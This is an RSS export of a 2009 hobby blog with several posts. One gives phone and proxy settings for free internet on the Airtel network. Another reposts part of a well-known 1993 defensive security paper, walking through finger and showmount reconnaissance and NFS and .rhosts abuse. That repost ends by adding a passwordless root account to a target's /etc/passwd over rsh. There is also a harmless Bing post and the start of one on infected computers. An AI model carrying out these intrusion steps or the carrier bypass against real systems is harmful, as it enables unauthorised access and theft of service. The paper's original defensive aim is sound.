<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-8378401052179741157</atom:id><lastBuildDate>Mon, 06 Dec 2021 04:28:06 +0000</lastBuildDate><category>Internet</category><category>Hack</category><category>Computer</category><category>Mobile</category><title>Computer</title><description></description><link>http://123mycomputer.blogspot.com/</link><managingEditor>noreply@blogger.com (AJEET)</managingEditor><generator>Blogger</generator><openSearch:totalResults>27</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle/><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-5458855820700202730</guid><pubDate>Mon, 21 Sep 2009 02:39:00 +0000</pubDate><atom:updated>2009-09-20T19:40:19.917-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><title>Airtel Hack For Free Internet Access</title><description>All you need to have is&lt;br /&gt;–&gt;PC&lt;br /&gt;–&gt;Serial/&lt;span7784970&gt;&lt;a href="javascript:void(0);" style="color: rgb(60, 115, 255); text-decoration: underline;" id="Y7784970S2"&gt;USB cable&lt;/a&gt;&lt;/span7784970&gt;/Bluetooth dongle&lt;br /&gt;–&gt;Any Browser(I suggest Opera as we can browse both &lt;span7784970&gt;&lt;a href="javascript:void(0);" style="color: rgb(60, 115, 255); text-decoration: underline;" id="Y7784970S6"&gt;wap&lt;/a&gt;&lt;/span7784970&gt; and other sites)&lt;br /&gt;&lt;br /&gt;Follow These Steps:&lt;br /&gt;—&gt;Activate Airtel Live sending a message MASALA Active to 121&lt;br /&gt;—&gt;Create a profile with the following settings in your data account under &lt;span7784970&gt;&lt;a href="javascript:void(0);" style="color: rgb(60, 115, 255); text-decoration: underline;" id="Y7784970S3"&gt;Data Communication&lt;/a&gt;&lt;/span7784970&gt;&lt;br /&gt;&lt;br /&gt;GATEWAY : 100.1.200.99&lt;br /&gt;APN : airtelfun.com&lt;br /&gt;USERNAME : blank&lt;br /&gt;PASSWORD : blank&lt;br /&gt;PASS REQ : OFF&lt;br /&gt;ALLOW CALLS : AUTOMATIC&lt;br /&gt;IPADDRESS :&lt;br /&gt;DNSADDRESS :&lt;br /&gt;DATA COMP : OFF&lt;br /&gt;HEADER COMP : OFF&lt;br /&gt;&lt;br /&gt;and then Under INTERNET PROFILES,&lt;br /&gt;&lt;br /&gt;INTERNET MODE : HTTP or WAP (both works)&lt;br /&gt;USE PROXY : YES&lt;br /&gt;&lt;span7784970&gt;&lt;a href="javascript:void(0);" style="color: rgb(60, 115, 255); text-decoration: underline;" id="Y7784970S5"&gt;IP ADDRESS&lt;/a&gt;&lt;/span7784970&gt; : 100.1.200.99&lt;br /&gt;PORT : 8080&lt;br /&gt;USERNAME :&lt;br /&gt;PASSWORD :&lt;br /&gt;&lt;br /&gt;–&gt;Create a new dial-up connection on your pc after connecting the mobile to pc,using the NEW CONNECTION WIZARD as follows&lt;br /&gt;&lt;br /&gt;ISP Name : Anyname&lt;br /&gt;Phone Number : *99***1#&lt;br /&gt;Username and Password : blank&lt;br /&gt;&lt;br /&gt;–&gt;Configure your browser to use the proxy 100.1.200.99 and port 8080.&lt;br /&gt;&lt;br /&gt;–&gt;Connect to the dial-up account. You will be connected at 115.2kbps&lt;br /&gt;&lt;br /&gt;—&gt;Now if you try to access any site on your mobile you ll get an &lt;span7784970&gt;&lt;a href="javascript:void(0);" style="color: rgb(60, 115, 255); text-decoration: underline;" id="Y7784970S9"&gt;error&lt;/a&gt;&lt;/span7784970&gt; message like “Access Denied”&lt;br /&gt;&lt;br /&gt;—&gt;Open your browser, and start browsing and voila it opens the regular sites and if u beleive ull get a d/l speed of 5-6 &lt;span7784970&gt;&lt;a href="javascript:void(0);" style="color: rgb(60, 115, 255); text-decoration: underline;" id="Y7784970S4"&gt;kbps&lt;/a&gt;&lt;/span7784970&gt;&lt;br /&gt;&lt;br /&gt;Common Errors:&lt;br /&gt;If you are getting any error wile dialing a dial up connection than go to&lt;br /&gt;&lt;span7784970&gt;&lt;a href="javascript:void(0);" style="color: rgb(60, 115, 255); text-decoration: underline;" id="Y7784970S7"&gt;Control panel&lt;/a&gt;&lt;/span7784970&gt;&gt;&gt; Phone and modem&gt;&gt;&gt;select modem and click on its properties &gt;&gt;advanced&lt;br /&gt;and enter the following initialization commands&lt;br /&gt;CODE&lt;br /&gt;AT+CGDCONT=2, “IP”,”airtelfun.com”,”",0,0&lt;br /&gt;&lt;br /&gt;Now it should be connected without any error......!</description><link>http://123mycomputer.blogspot.com/2009/09/airtel-hack-for-free-internet-access.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-2944969903861804289</guid><pubDate>Mon, 21 Sep 2009 02:36:00 +0000</pubDate><atom:updated>2009-09-20T19:37:59.293-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><title>Improving the Security of Your Site by Breaking Into it</title><description>Introduction&lt;br /&gt;&lt;br /&gt;------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Every day, all over the world, computer networks and hosts are being&lt;br /&gt;&lt;br /&gt;broken into.   The level of sophistication of these attacks varies&lt;br /&gt;&lt;br /&gt;widely; while it is generally believed that most break-ins succeed due&lt;br /&gt;&lt;br /&gt;to weak passwords, there are still a large number of intrusions that use&lt;br /&gt;&lt;br /&gt;more advanced techniques to break in.   Less is known about the latter&lt;br /&gt;&lt;br /&gt;types of break-ins, because by their very nature they are much harder to&lt;br /&gt;&lt;br /&gt;detect.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CERT.   SRI.   The Nic.   NCSC.   RSA.   NASA.   MIT.   Uunet.   Berkeley .&lt;br /&gt;&lt;br /&gt;Purdue.   Sun.   You name it, we've seen it broken into.   Anything that is&lt;br /&gt;&lt;br /&gt;on the Internet (and many that isn't) seems to be fairly easy game.   Are&lt;br /&gt;&lt;br /&gt;these targets unusual?   What happened?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Fade to...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;A young boy, with greasy blonde hair, sitting in a dark room.   The room&lt;br /&gt;&lt;br /&gt;is illuminated only by the luminescense of the C64's 40 character&lt;br /&gt;&lt;br /&gt;screen.   Taking another long drag from his Benson and Hedges cigarette,&lt;br /&gt;&lt;br /&gt;the weary system cracker telnets to the next faceless ".mil" site on his&lt;br /&gt;&lt;br /&gt;hit list.   "guest -- guest", "root -- root", and "system -- manager" all&lt;br /&gt;&lt;br /&gt;fail.   No matter.   He has all night... he pencils the host off of his&lt;br /&gt;&lt;br /&gt;list, and tiredly types in the next potential victim...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This seems to be the popular image of a system cracker.   Young,&lt;br /&gt;&lt;br /&gt;inexperienced, and possessing vast quantities of time to waste, to get&lt;br /&gt;&lt;br /&gt;into just one more system.   However, there is a far more dangerous type&lt;br /&gt;&lt;br /&gt;of system cracker out there.   One who knows the ins and outs of the&lt;br /&gt;&lt;br /&gt;latest security auditing and cracking tools, who can modify them for&lt;br /&gt;&lt;br /&gt;specific attacks, and who can write his/her own programs.   One who not&lt;br /&gt;&lt;br /&gt;only reads about the latest security holes, but also personally&lt;br /&gt;&lt;br /&gt;discovers bugs and vulnerabilities.   A deadly creature that can both&lt;br /&gt;&lt;br /&gt;strike poisonously and hide its tracks without a whisper or hint of a&lt;br /&gt;&lt;br /&gt;trail.   The uebercracker is here.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's&lt;br /&gt;&lt;br /&gt;uebermensch, or, literally translated into English, "over man."&lt;br /&gt;&lt;br /&gt;Nietzsche used the term not to refer to a comic book superman, but&lt;br /&gt;&lt;br /&gt;instead a man who had gone beyond the incompetence, pettiness, and&lt;br /&gt;&lt;br /&gt;weakness of the everyday man.   The uebercracker is therefore the system&lt;br /&gt;&lt;br /&gt;cracker who has gone beyond simple cookbook methods of breaking into&lt;br /&gt;&lt;br /&gt;systems.   An uebercracker is not usually motivated to perform random&lt;br /&gt;&lt;br /&gt;acts of violence.   Targets are not arbitrary -- there is a purpose,&lt;br /&gt;&lt;br /&gt;whether it be personal monetary gain, a hit and run raid for&lt;br /&gt;&lt;br /&gt;information, or a challenge to strike a major or prestigious site or&lt;br /&gt;&lt;br /&gt;net.personality.   An uebercracker is hard to detect, harder to stop, and&lt;br /&gt;&lt;br /&gt;hardest to keep out of your site for good.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Overview&lt;br /&gt;&lt;br /&gt;--------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In this paper we will take an unusual approach to system security.&lt;br /&gt;&lt;br /&gt;Instead of merely saying that something is a problem, we will look&lt;br /&gt;&lt;br /&gt;through the eyes of a potential intruder, and show _why_ it is one.   We&lt;br /&gt;&lt;br /&gt;will illustrate that even seemingly harmless network services can become&lt;br /&gt;&lt;br /&gt;valuable tools in the search for weak points of a system, even when&lt;br /&gt;&lt;br /&gt;these services are operating exactly as they are intended to.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In an effort to shed some light on how more advanced intrusions occur,&lt;br /&gt;&lt;br /&gt;this paper outlines various mechanisms that crackers have actually used&lt;br /&gt;&lt;br /&gt;to obtain access to systems and, in addition, some techniques we either&lt;br /&gt;&lt;br /&gt;suspect intruders of using, or that we have used ourselves in tests or&lt;br /&gt;&lt;br /&gt;in friendly/authorized environments.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Our motivation for writing this paper is that system administrators are&lt;br /&gt;&lt;br /&gt;often unaware of the dangers presented by anything beyond the most&lt;br /&gt;&lt;br /&gt;trivial attacks.   While it is widely known that the proper level of&lt;br /&gt;&lt;br /&gt;protection depends on what has to be protected, many sites appear to&lt;br /&gt;&lt;br /&gt;lack the resources to assess what level of host and network security is&lt;br /&gt;&lt;br /&gt;adequate.   By showing what intruders can do to gain access to a remote&lt;br /&gt;&lt;br /&gt;site, we are trying to help system administrators to make _informed_&lt;br /&gt;&lt;br /&gt;decisions on how to secure their site -- or not.   We will limit the&lt;br /&gt;&lt;br /&gt;discussion to techniques that can give a remote intruder access to a&lt;br /&gt;&lt;br /&gt;(possibly non-interactive) shell process on a UNIX host.   Once this is&lt;br /&gt;&lt;br /&gt;achieved, the details of obtaining root privilege are beyond the scope&lt;br /&gt;&lt;br /&gt;of this work -- we consider them too site-dependent and, in many cases,&lt;br /&gt;&lt;br /&gt;too trivial to merit much discussion.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We want to stress that we will not merely run down a list of bugs or&lt;br /&gt;&lt;br /&gt;security holes -- there will always be new ones for a potential attacker&lt;br /&gt;&lt;br /&gt;to exploit.   The purpose of this paper is to try to get the reader to&lt;br /&gt;&lt;br /&gt;look at her or his system in a new way -- one that will hopefully afford&lt;br /&gt;&lt;br /&gt;him or her the opportunity to _understand_ how their system can be&lt;br /&gt;&lt;br /&gt;compromised, and how.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We would also like to reiterate to the reader that the purpose of this&lt;br /&gt;&lt;br /&gt;paper is to show you how to test the security of your own site, not how&lt;br /&gt;&lt;br /&gt;to break into other people's systems.   The intrusion techniques we&lt;br /&gt;&lt;br /&gt;illustrate here will often leave traces in your system auditing logs --&lt;br /&gt;&lt;br /&gt;it might be constructive to examine them after trying some of these&lt;br /&gt;&lt;br /&gt;attacks out, to see what a real attack might look like.   Certainly other&lt;br /&gt;&lt;br /&gt;sites and system administrators will take a very dim view of your&lt;br /&gt;&lt;br /&gt;activities if you decide to use their hosts for security testing without&lt;br /&gt;&lt;br /&gt;advance authorization; indeed, it is quite possible that legal action&lt;br /&gt;&lt;br /&gt;may be pursued against you if they perceive it as an attack.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are four main parts to the paper.   The first part is the&lt;br /&gt;&lt;br /&gt;introduction and overview.   The second part attempts to give the reader&lt;br /&gt;&lt;br /&gt;a feel for what it is like to be an intruder and how to go from knowing&lt;br /&gt;&lt;br /&gt;nothing about a system to compromising its security.   This section goes&lt;br /&gt;&lt;br /&gt;over actual techniques to gain information and entrance and covers basic&lt;br /&gt;&lt;br /&gt;strategies such as exploiting trust and abusing improperly configured&lt;br /&gt;&lt;br /&gt;basic network services (ftp, mail, tftp, etc.)   It also discusses&lt;br /&gt;&lt;br /&gt;slightly more advanced topics, such as NIS and NFS, as well as various&lt;br /&gt;&lt;br /&gt;common bugs and configuration problems that are somewhat more OS or&lt;br /&gt;&lt;br /&gt;system specific.   Defensive strategies against each of the various&lt;br /&gt;&lt;br /&gt;attacks are also covered here.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The third section deals with trust: how the security of one system&lt;br /&gt;&lt;br /&gt;depends on the integrity of other systems.   Trust is the most complex&lt;br /&gt;&lt;br /&gt;subject in this paper, and for the sake of brevity we will limit the&lt;br /&gt;&lt;br /&gt;discussion to clients in disguise.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The fourth section covers the basic steps that a system administrator&lt;br /&gt;&lt;br /&gt;may take to protect her or his system.   Most of the methods presented&lt;br /&gt;&lt;br /&gt;here are merely common sense, but they are often ignored in practice --&lt;br /&gt;&lt;br /&gt;one of our goals is to show just how dangerous it can be to ignore basic&lt;br /&gt;&lt;br /&gt;security practices.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Case studies, pointers to security-related information, and software are&lt;br /&gt;&lt;br /&gt;described in the appendices at the end of the paper.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;While exploring the methods and strategies discussed in this paper we we&lt;br /&gt;&lt;br /&gt;wrote SATAN (Security Analysis Tool for Auditing Networks.)   Written in&lt;br /&gt;&lt;br /&gt;shell, perl, expect and C, it examines a remote host or set of hosts and&lt;br /&gt;&lt;br /&gt;gathers as much information as possible by remotely probing NIS, finger,&lt;br /&gt;&lt;br /&gt;NFS, ftp and tftp, rexd, and other services.   This information includes&lt;br /&gt;&lt;br /&gt;the presence of various network information services as well as&lt;br /&gt;&lt;br /&gt;potential security flaws -- usually in the form of incorrectly setup or&lt;br /&gt;&lt;br /&gt;configured network services, well-known bugs in system or network&lt;br /&gt;&lt;br /&gt;utilities, or poor or ignorant policy decisions.   It then can either&lt;br /&gt;&lt;br /&gt;report on this data or use an expert system to further investigate any&lt;br /&gt;&lt;br /&gt;potential security problems.   While SATAN doesn't use all of the methods&lt;br /&gt;&lt;br /&gt;that we discuss in the paper, it has succeeded with ominous regularity&lt;br /&gt;&lt;br /&gt;in finding serious holes in the security of Internet sites.   It will be&lt;br /&gt;&lt;br /&gt;posted and made available via anonymous ftp when completed; Appendix A&lt;br /&gt;&lt;br /&gt;covers its salient features.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note that it isn't possible to cover all possible methods of breaking&lt;br /&gt;&lt;br /&gt;into systems in a single paper.   Indeed, we won't cover two of the most&lt;br /&gt;&lt;br /&gt;effective methods of breaking into hosts: social engineering and&lt;br /&gt;&lt;br /&gt;password cracking.   The latter method is so effective, however, that&lt;br /&gt;&lt;br /&gt;several of the strategies presented here are geared towards acquiring&lt;br /&gt;&lt;br /&gt;password files.   In addition, while windowing systems (X, OpenWindows,&lt;br /&gt;&lt;br /&gt;etc.) can provide a fertile ground for exploitation, we simply don't&lt;br /&gt;&lt;br /&gt;know many methods that are used to break into remote systems.   Many&lt;br /&gt;&lt;br /&gt;system crackers use non-bitmapped terminals which can prevent them from&lt;br /&gt;&lt;br /&gt;using some of the more interesting methods to exploit windowing systems&lt;br /&gt;&lt;br /&gt;effectively (although being able to monitor the victim's keyboard is&lt;br /&gt;&lt;br /&gt;often sufficient to capture passwords).   Finally, while worms, viruses,&lt;br /&gt;&lt;br /&gt;trojan horses, and other malware are very interesting, they are not&lt;br /&gt;&lt;br /&gt;common (on UNIX systems) and probably will use similar techniques to the&lt;br /&gt;&lt;br /&gt;ones we describe in this paper as individual parts to their attack&lt;br /&gt;&lt;br /&gt;strategy.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Gaining Information&lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Let us assume that you are the head system administrator of Victim&lt;br /&gt;&lt;br /&gt;Incorporated's network of UNIX workstations.   In an effort to secure&lt;br /&gt;&lt;br /&gt;your machines, you ask a friendly system administrator from a nearby&lt;br /&gt;&lt;br /&gt;site (evil.com) to give you an account on one of her machines so that&lt;br /&gt;&lt;br /&gt;you can look at your own system's security from the outside.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;What should you do?   First, try to gather information about your&lt;br /&gt;&lt;br /&gt;(target) host.   There is a wealth of network services to look at:&lt;br /&gt;&lt;br /&gt;finger, showmount, and rpcinfo are good starting points.   But don't stop&lt;br /&gt;&lt;br /&gt;there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,&lt;br /&gt;&lt;br /&gt;and as many other services as you can find.   There are so many methods&lt;br /&gt;&lt;br /&gt;and techniques that space precludes us from showing all of them, but we&lt;br /&gt;&lt;br /&gt;will try to show a cross-section of the most common and/or dangerous&lt;br /&gt;&lt;br /&gt;strategies that we have seen or have thought of.   Ideally, you would&lt;br /&gt;&lt;br /&gt;gather such information about all hosts on the subnet or area of attack&lt;br /&gt;&lt;br /&gt;-- information is power -- but for now we'll examine only our intended&lt;br /&gt;&lt;br /&gt;target.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To start out, you look at what the ubiquitous finger command shows you&lt;br /&gt;&lt;br /&gt;(assume it is 6pm, Nov 6, 1993):&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; victim % finger @victim.com&lt;br /&gt;&lt;br /&gt; [victim.com]&lt;br /&gt;&lt;br /&gt; Login        Name              TTY Idle      When     Where&lt;br /&gt;&lt;br /&gt; zen       Dr.   Fubar            co    1d   Wed 08:00    death.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Good!   A single idle user -- it is likely that no one will notice if you&lt;br /&gt;&lt;br /&gt;actually manage to break in.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now you try more tactics.   As every finger devotee knows, fingering "@",&lt;br /&gt;&lt;br /&gt;"0", and "", as well as common names, such as root, bin, ftp, system,&lt;br /&gt;&lt;br /&gt;guest, demo, manager, etc., can reveal interesting information.   What&lt;br /&gt;&lt;br /&gt;that information is depends on the version of finger that your target is&lt;br /&gt;&lt;br /&gt;running, but the most notable are account names, along with their home&lt;br /&gt;&lt;br /&gt;directories and the host that they last logged in from.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To add to this information, you can use rusers (in particular with the&lt;br /&gt;&lt;br /&gt;-l flag) to get useful information on logged-in users.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Trying these commands on victim.com reveals the following information,&lt;br /&gt;&lt;br /&gt;presented in a compressed tabular form to save space:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; Login    Home-dir     Shell       Last login, from where&lt;br /&gt;&lt;br /&gt; -----    --------      -----       ----------------------&lt;br /&gt;&lt;br /&gt; root     /            /bin/sh     Fri Nov 5 07:42 on ttyp1 from big.victim.com&lt;br /&gt;&lt;br /&gt; bin      /bin                    Never logged in&lt;br /&gt;&lt;br /&gt; nobody   /                       Tue Jun 15 08:57 on ttyp2 from server.victim.co&lt;br /&gt;&lt;br /&gt; daemon   /                        Tue Mar 23 12:14 on ttyp0 from big.victim.com&lt;br /&gt;&lt;br /&gt; sync     /            /bin/sync   Tue Mar 23 12:14 on ttyp0 from big.victim.com&lt;br /&gt;&lt;br /&gt; zen      /home/zen    /bin/bash   On since Wed Nov   6 on ttyp3 from death.com&lt;br /&gt;&lt;br /&gt; sam      /home/sam    /bin/csh    Wed Nov   5 05:33 on ttyp3 from evil.com&lt;br /&gt;&lt;br /&gt; guest    /export/foo /bin/sh     Never logged in&lt;br /&gt;&lt;br /&gt; ftp      /home/ftp               Never logged in&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Both our experiments with SATAN and watching system crackers at work&lt;br /&gt;&lt;br /&gt;have proved to us that finger is one of the most dangerous services,&lt;br /&gt;&lt;br /&gt;because it is so useful for investigating a potential target.   However,&lt;br /&gt;&lt;br /&gt;much of this information is useful only when used in conjunction with&lt;br /&gt;&lt;br /&gt;other data.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;For instance, running showmount on your target reveals:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; evil % showmount -e victim.com&lt;br /&gt;&lt;br /&gt; export list for victim.com:&lt;br /&gt;&lt;br /&gt; /export                             (everyone)&lt;br /&gt;&lt;br /&gt; /var                                (everyone)&lt;br /&gt;&lt;br /&gt; /usr                                easy&lt;br /&gt;&lt;br /&gt; /export/exec/kvm/sun4c.sunos.4.1.3 easy&lt;br /&gt;&lt;br /&gt; /export/root/easy                   easy&lt;br /&gt;&lt;br /&gt; /export/swap/easy                   easy&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note that /export/foo is exported to the world; also note that this is&lt;br /&gt;&lt;br /&gt;user guest's home directory.   Time for your first break-in!   In this&lt;br /&gt;&lt;br /&gt;case, you'll mount the home directory of user "guest."   Since you don't&lt;br /&gt;&lt;br /&gt;have a corresponding account on the local machine and since root cannot&lt;br /&gt;&lt;br /&gt;modify files on an NFS mounted filesystem, you create a "guest" account&lt;br /&gt;&lt;br /&gt;in your local password file.   As user guest you can put an .rhosts entry&lt;br /&gt;&lt;br /&gt;in the remote guest home directory, which will allow you to login to the&lt;br /&gt;&lt;br /&gt;target machine without having to supply a password.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; evil # mount victim.com:/export/foo /foo&lt;br /&gt;&lt;br /&gt; evil # cd /foo&lt;br /&gt;&lt;br /&gt; evil # ls -lag&lt;br /&gt;&lt;br /&gt; total 3&lt;br /&gt;&lt;br /&gt;   1 drwxr-xr-x 11 root      daemon         512 Jun 19 09:47 .&lt;br /&gt;&lt;br /&gt;   1 drwxr-xr-x   7 root      wheel           512 Jul 19   1991 ..&lt;br /&gt;&lt;br /&gt;   1 drwx--x--x   9 10001     daemon        1024 Aug   3 15:49 guest&lt;br /&gt;&lt;br /&gt; evil # echo guest:x:10001:1:temporary breakin account:/: &gt;&gt; /etc/passwd&lt;br /&gt;&lt;br /&gt; evil # ls -lag&lt;br /&gt;&lt;br /&gt; total 3&lt;br /&gt;&lt;br /&gt;   1 drwxr-xr-x 11 root      daemon         512 Jun 19 09:47 .&lt;br /&gt;&lt;br /&gt;    1 drwxr-xr-x   7 root      wheel          512 Jul 19   1991 ..&lt;br /&gt;&lt;br /&gt;   1 drwx--x--x   9 guest     daemon        1024 Aug   3 15:49 guest&lt;br /&gt;&lt;br /&gt; evil # su guest&lt;br /&gt;&lt;br /&gt; evil % echo evil.com &gt;&gt; guest/.rhosts&lt;br /&gt;&lt;br /&gt; evil % rlogin victim.com&lt;br /&gt;&lt;br /&gt;               Welcome to victim.com!&lt;br /&gt;&lt;br /&gt; victim %&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If, instead of home directories, victim.com were exporting filesystems&lt;br /&gt;&lt;br /&gt;with user commands (say, /usr or /usr/local/bin), you could replace a&lt;br /&gt;&lt;br /&gt;command with a trojan horse that executes any command of your choice.&lt;br /&gt;&lt;br /&gt;The next user to execute that command would execute your program.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We suggest that filesystems be exported:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;o    Read/write only to specific, trusted clients.&lt;br /&gt;&lt;br /&gt;o    Read-only, where possible (data or programs can often be&lt;br /&gt;&lt;br /&gt;   exported in this manner.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If the target has a "+" wildcard in its /etc/hosts.equiv (the default in&lt;br /&gt;&lt;br /&gt;various vendor's machines) or has the netgroups bug (CERT advisory&lt;br /&gt;&lt;br /&gt;91:12), any non-root user with a login name in the target's password&lt;br /&gt;&lt;br /&gt;file can rlogin to the target without a password.   And since the user&lt;br /&gt;&lt;br /&gt;"bin" often owns key files and directories, your next attack is to try&lt;br /&gt;&lt;br /&gt;to log in to the target host and modify the password file to let you&lt;br /&gt;&lt;br /&gt;have root access:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; evil % whoami&lt;br /&gt;&lt;br /&gt; bin&lt;br /&gt;&lt;br /&gt; evil % rsh victim.com csh -i&lt;br /&gt;&lt;br /&gt; Warning: no access to tty; thus no job control in this shell...&lt;br /&gt;&lt;br /&gt; victim %   ls -ldg /etc&lt;br /&gt;&lt;br /&gt; drwxr-sr-x   8 bin       staff         2048 Jul 24 18:02 /etc&lt;br /&gt;&lt;br /&gt; victim %   cd /etc&lt;br /&gt;&lt;br /&gt; victim %   mv passwd pw.old&lt;br /&gt;&lt;br /&gt; victim %   (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) &gt; passwd&lt;br /&gt;&lt;br /&gt; victim % ^D&lt;br /&gt;&lt;br /&gt; evil % rlogin victim.com -l toor&lt;br /&gt;&lt;br /&gt;               Welcome to victim.com!&lt;br /&gt;&lt;br /&gt; victim #</description><link>http://123mycomputer.blogspot.com/2009/09/improving-security-of-your-site-by.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-701868525453515462</guid><pubDate>Fri, 18 Sep 2009 06:39:00 +0000</pubDate><atom:updated>2009-09-17T23:41:45.407-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Computer</category><title>Meet an Awesome Search Engine for iPhone Apps – Bing</title><description>Bing has just launched a new feature called &lt;a href="http://www.bing.com/visualsearch" jquery1253256088765="2"&gt;Visual Search&lt;/a&gt; where you can search stuff with the mouse without having to any text queries.&lt;br /&gt;For instance, you can open the &lt;a href="http://www.bing.com/visualsearch?q=Popular+books&amp;amp;g=top_books&amp;amp;FORM=Z9GE10" jquery1253256088765="3"&gt;book section&lt;/a&gt;, scroll through the popular book covers (they are sorted by name by default) and then narrow the search results based on the author name, the category of the book or even the length (number of pages). You can further sort this resultset based on the book’s release date or the sales rank of that book.&lt;br /&gt;Bing’s Visual Search includes an awesome interface for finding apps for your iPhone or iPod Touch without firing up the iTunes Apps store.&lt;br /&gt;Go to &lt;a href="http://www.bing.com/visualsearch?q=Top+iPhone+apps&amp;amp;g=iphone_apps&amp;amp;FORM=Z9GE62" jquery1253256088765="4"&gt;Top iPhone Apps&lt;/a&gt;, narrow down your search results by category (Productivity, Games, Office, etc), choose whether you are looking for free app or paid ones (and if so, you can also specify the price range) and there you have all the apps that you may be looking for.&lt;br /&gt;Yoga Poses are another interesting feature of Bing. Basically you can narrow down search results to yoga poses that help in the ailment of particular diseases or poses that are beneficial for different body parts (arms, heart, etc.).&lt;br /&gt;Then you have &lt;a href="http://www.bing.com/visualsearch?q=Travel+destinations&amp;amp;g=travel_destinations" jquery1253256088765="5"&gt;travel destinations&lt;/a&gt; to help you plan your next family vacation.&lt;br /&gt;You can not only filter places visually based on countries and on months when you are planning to take a break. And if things look a bit confusing, just choose the "Most popular on Bing" option to just see places that are most popular on the web.&lt;br /&gt;Video screencast – Bing&lt;br /&gt;If you don’t have the Silverlight plugin on your computer yet, it’s time to &lt;a href="http://silverlight.net/" jquery1253256088765="6"&gt;get one&lt;/a&gt; else you’ll miss using something that not only beautiful but very useful as well.</description><link>http://123mycomputer.blogspot.com/2009/09/meet-awesome-search-engine-for-iphone.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-7994103566872638678</guid><pubDate>Wed, 16 Sep 2009 02:15:00 +0000</pubDate><atom:updated>2009-09-15T19:16:37.840-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Computer</category><category domain="http://www.blogger.com/atom/ns#">Hack</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>How to fix your infected computer</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_fMrF3L8CTmg/SqI-H3EngYI/AAAAAAAAAHA/tQSSr3sp5I4/s1600-h/images.jpg"&gt;&lt;img style="margin: 0px auto 10px; 